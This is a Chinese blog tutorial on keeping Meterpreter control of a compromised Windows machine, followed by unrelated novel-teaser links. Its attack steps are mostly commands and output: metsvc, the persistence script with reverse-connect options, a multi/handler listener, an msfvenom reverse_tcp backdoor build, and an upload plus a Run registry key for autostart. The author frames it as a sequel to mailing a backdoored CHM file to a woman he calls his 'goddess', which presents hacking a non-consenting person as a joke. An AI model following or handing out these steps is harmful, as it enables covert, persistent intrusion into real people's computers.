Meterpreter控制持久化 | Arche

0x00 前言

继上篇文章《制作CHM文件后门》,成功制作了一份具有欺骗性的CHM帮助文件,并通过邮件发送给了女神。女神居然2话不说就点击查看了,因此一个联向女神电脑的Meterpreter会话成功Get。</坏笑>
 对于一般的渗透流程来说,当GetShell后,首先想到的肯定是留下后门,以便后续能持续化进行控制。
 可是,后门如何制作?如何使后门能正确工作?对于新手来说,这也是一个不小的挑战。
 我们既然使用Metaspliot平台,其号称渗透界神器,此等小事,肯定不在话下。
 因此,我们来见识下Metaspliot在获取到Meterpreter会话后如何留下后门,进行控制持久化。

0x01 Meterpreter控制持久化

 Meterpreter提供2种方式的后门,一种是通过服务启动(metsvc),一种是通过启动项启动(persistence)。
 通过服务(metsvc)启动的方式,其优点便是命令简单方便。使用此方式的后门不进行反弹回连,因此不必设置太多参数。该后门在目标机器启动后自启动一个”服务器”来等待黑阔连接,因此黑阔可以随时随地通过该后门进入目标机器,十分简单方便。当然,其缺点也十分明显。当其他黑阔使用扫描软件扫出该”服务器”的存在时,任何人便可以通过该后门直达目标机器内部。毫无安全性可言。
 通过启动项启动(persistence)的方式,其缺点便是参数较为复杂,当设置某项参数后,很有可能因为权限问题导致该设置项并未生效,并且无错误回显,导致持续化控制可能失败,功败垂成。当然,其优点也可圈可点。该方式是在目标机器上以反弹回连方式来连接黑阔的”服务器”,目标机器上的防火墙对于此等操作一般均会放行,因此后门的存活率较高,黑阔只需坐等羔羊送上门来。

0x03 Meterpreter持续化控制命令

使用metsvc生成后门命令十分简单:

meterpreter > run metsvc

[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\Arche\AppData\Local\Temp\nKTNwwJaSWG...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.

meterpreter >
 这里,我们主要以persistence方式为主。首先,我们查看下persistence的帮助信息
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
可以看出要使用新的脚本,举个例子
run post/windows/manage/persistence_exe REXENAME=cmd.exe REXEPATH=/root/backdoor/miao.exe STARTUP=USER

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS: 
-A Automatically start a matching exploit /multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval
in
seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back

meterpreter >

此处,几个比较重要的参数为
 -P:设置Payload,默认为windows/meterpreter/reverse_tcp。该默认的payload生成的后门为32位程序。因此,当目标机器为64位系统时,留下的后门将无法运行
 -U:设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。推荐使用该参数
 -X:设置后门在系统启动后自启动。该方式会在HKLM\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。由于权限问题,会导致添加失败,后门将无法启动。因此,在非管理员权限或者未进行BypassUAC操作情况下,不推荐使用该参数。
 -i:设置反向连接间隔时间,单位为秒。当设置该参数后,目标机器会每隔设置的时间回连一次所设置的ip
 -p:设置反向连接的端口号。即黑阔用来等待连接的端口
 -r:设置反向连接的ip地址。即黑阔用来等待连接的ip
 因此,一个完整的命令为:

meterpreter > run persistence -U -i 10 -p 6666 -r 192.168.4.95
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ROTK-PC_20171031.2840/ROTK-PC_20171031.2840.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.4.95 LPORT=6666
[*] Persistent agent script is 99654 bytes long
[+] Persistent Script written to C:\Users\ROTK\AppData\Local\Temp\wNjaOZQi.vbs
[*] Executing script C:\Users\ROTK\AppData\Local\Temp\wNjaOZQi.vbs
[+] Agent executed with PID 2564
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\EnKZjOUJ
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\EnKZjOUJ
meterpreter >

0x04 连接后门

当后门留好后,我们需要设置监听来等待后门被触发,以致反弹连接我们的”服务器”

msf > use exploit /multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.17.131
LHOST => 192.168.17.131
msf exploit(handler) > set LPORT 6666
LPORT => 6666
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.17.131:6666
[*] Starting the payload handler...
[*] Sending stage (1188911 bytes) to 192.168.17.137
[*] Meterpreter session 1 opened (192.168.17.131:6666 -> 192.168.17.137:61273) at 2016-08-31 10:49:34 -0400
meterpreter >

此时,当用户触发后门时,可以看到,一个meterpreter又建立了。
0x05 64位系统的后门制作
 如果是32位系统,按照前面的流程,此时后门已经部署完成了。
 但是,如果是64位的系统,你会发现,后门已经成功部署了,但却无法正常启动。

这时,需要生成一个64位的后门

root@kali:~

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o ~/backdoor.exe lhost=192.168.17.131 lport=6666

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86_64 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 510 bytes

Saved as:
/root/backdoor
.exe

root@kali:~

这时,在你~/目录下,会生成一个以payload为windows/x64/meterpreter/reverse_tcp的后门。该后门可在64位系统上正常运行。
 那么,后门已经有了。如何部署到目标机器上呢?
 其实,我们可以看到,在run persistence脚本时,其主要的工作是上传后门到目标机器,而后再写自启动注册表。仅此2步,何不手动为之?
上传文件:
1
2
3

meterpreter > upload
/root/backdoor
.exe c:\
users
\arche\AppData\
local
\backdoor.exe

[*] uploading :
/root/backdoor
.exe -> c:
users
\arche\AppData
local
\backdoor.exe

[*] uploaded :
/root/backdoor
.exe -> c:
users
\arche\AppData
local
\backdoor.exe

写注册表:
1
2
3

meterpreter > reg setval -k HKCU\Software\Microsoft\Windows\CurrentVersion\Run -
v
backdoor -d c:\
users
\arche\AppData\
local
\backdoor.exe

Successfully
set
backdoor of REG_SZ.

meterpreter >

这时,64位系统的后门也已经部署完成!
0x06 后话
 使用CHM加metasploit很容易制作木马并持续化进行控制,但工具的带来的简便切不可用来为非作歹。这儿仅仅是为了学习与好玩而已,恰如Linus大神所说的”Just for fun”
 话说,一般用户电脑上只要装有杀毒软件,metasploit生成的后门都会被干掉啦。所以上述内容几乎都是废话啊哈哈哈哈哈哈哈哈哈哈哈哈哈哈。女神的电脑上居然装了qx电脑管家、3×0安全卫士、迈克菲杀毒。。。。

最后编辑于
?著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,029评论 6 493
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,238评论 3 388
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事?!?“怎么了?”我有些...
    开封第一讲书人阅读 159,576评论 0 349
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,214评论 1 287
  • ?港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,324评论 6 386
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,392评论 1 292
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,416评论 3 412
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,196评论 0 269
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,631评论 1 306
  • ?护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,919评论 2 328
  • ?白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,090评论 1 342
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,767评论 4 337
  • ?日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,410评论 3 322
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,090评论 0 21
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,328评论 1 267
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,952评论 2 365
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,979评论 2 351

推荐阅读更多精彩内容